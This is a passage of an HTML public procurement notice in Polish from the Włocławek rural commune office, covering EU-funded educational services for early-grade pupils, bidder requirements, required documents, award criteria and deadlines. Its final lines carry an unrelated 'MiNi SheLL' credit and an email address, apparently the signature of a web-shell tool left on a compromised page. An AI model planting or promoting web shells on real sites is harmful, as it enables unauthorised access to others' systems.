Ponadto, do obowiązków wykonawcy należało będzie opracowanie informacji do Wniosku beneficjenta o płatność POKL w zakresie: postępu rzeczowego realizacji projektu (z uwzględnieniem działań na rzecz równości szans kobiet i mężczyzn), szczegółowej charakterystyki udzielonego wsparcia, w tym stopnia osiągnięcia wartości wskaźników..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 39.16.21.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem ww. warunku będzie oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Pzp. 
Zamawiający dokona oceny spełnienia tego warunku na podstawie dokumentów załączonych do oferty, stosując formułę spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest do wykazania w okresie ostatnich trzech lat przed upływem 	terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 	realizację minimum dwóch zamówień podobnych zgodnych z przedmiotem zamówienia o 	wartości nie mniejszej niż 60.000 zł brutto każda. Przez zamówienie podobne zamawiający 	rozumie zamówienia realizowane w ramach projektów z Indywidualizacji procesu nauczania 	i wychowania uczniów klas I-III szkół podstawowych, których przedmiotem były łącznie: 	usługi edukacyjne stanowiące przedmiot niniejszego postępowania oraz dostawy materiałów 	edukacyjnych.
Zamawiający dokona oceny spełnienia tego warunku na podstawie dokumentów załączonych do oferty - Wykaz wykonanych usług wraz z dowodami o wykonaniu lub wykonaniu należycie - stosując formułę spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem ww. warunku będzie oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Pzp. 
Zamawiający dokona oceny spełnienia tego warunku na podstawie dokumentów załączonych do oferty, stosując formułę spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy, że osoby, które będą prowadzić zajęcia  dydaktyczne posiadają kwalifikacje do prowadzenia zajęć z poszczególnych zakresów zgodnie z rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. z 2013 r. poz. 1207) 
Zamawiający dokona oceny spełnienia tego warunku na podstawie dokumentów załączonych do oferty, stosując formułę spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem ww. warunku będzie oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Pzp. 
Zamawiający dokona oceny spełnienia tego warunku na podstawie dokumentów załączonych do oferty, stosując formułę spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	ofertę sporządzoną według wzoru formularza oferty,
b)	wzór umowy - podparafowany na każdej stronie i zaakceptowany na ostatniej stronie przez Wykonawcę załączony do SIWZ
c)	pełnomocnictwa dla osób składających ofertę w przypadku działania Wykonawcy przez pełnomocnika z zakresem upełnomocnienia, 
d)	pełnomocnictwa dla pełnomocnika ustanowionego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego z zakresem upełnomocnienia,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - doświadczenie - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: 
Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian
Zamawiający zgodnie z art. 144 Pzp. dopuszcza istotne zmiany zawartej umowy w następujących sytuacjach: - zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy, w tym prawa miejscowego; - wystąpienie urzędowej zmiany stawki podatku VAT po dacie zawarcia umowy, tj. obniżeniu lub podwyższeniu ceny wskutek zmiany przez władzę ustawodawczą stawki podatku VAT; - odstąpienie na wniosek Zamawiającego od realizacji części zamówienia i związana z tym zmiana wynagrodzenia. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowi jednocześnie zobowiązania do wyrażenia takiej zgody. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych: - zmiana danych związanych z obsługą administracyjno - organizacyjną umowy (np. zmiana nr rachunku bankowego); - zmiana danych teleadresowych, zmiana osób wskazanych do kontaktów między stronami.
Zamawiający dopuszcza również możliwość zmiany umowy w przypadku  zmiany wskazanych w ofercie materiałów dydaktycznych w sytuacji niedostępności ich na rynku (np. zaprzestanie publikacji, wydawania, wycofanie ze sprzedaży itp.). Powyższa zmiana dopuszczalna jest 
w przypadku zagwarantowania towaru równoważnego i wyłącznie za zgodą Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gmina.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie zamawiającego: Urząd Gminy Włocławek, ul. Królewiecka 7, 87-800 Włocławek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.01.2014 godzina 09:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego: Urząd Gminy Włocławek ul. Królewiecka 7, 87-800 Włocławek , sekretariat - pokój nr 5 (piętro)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki, Działanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com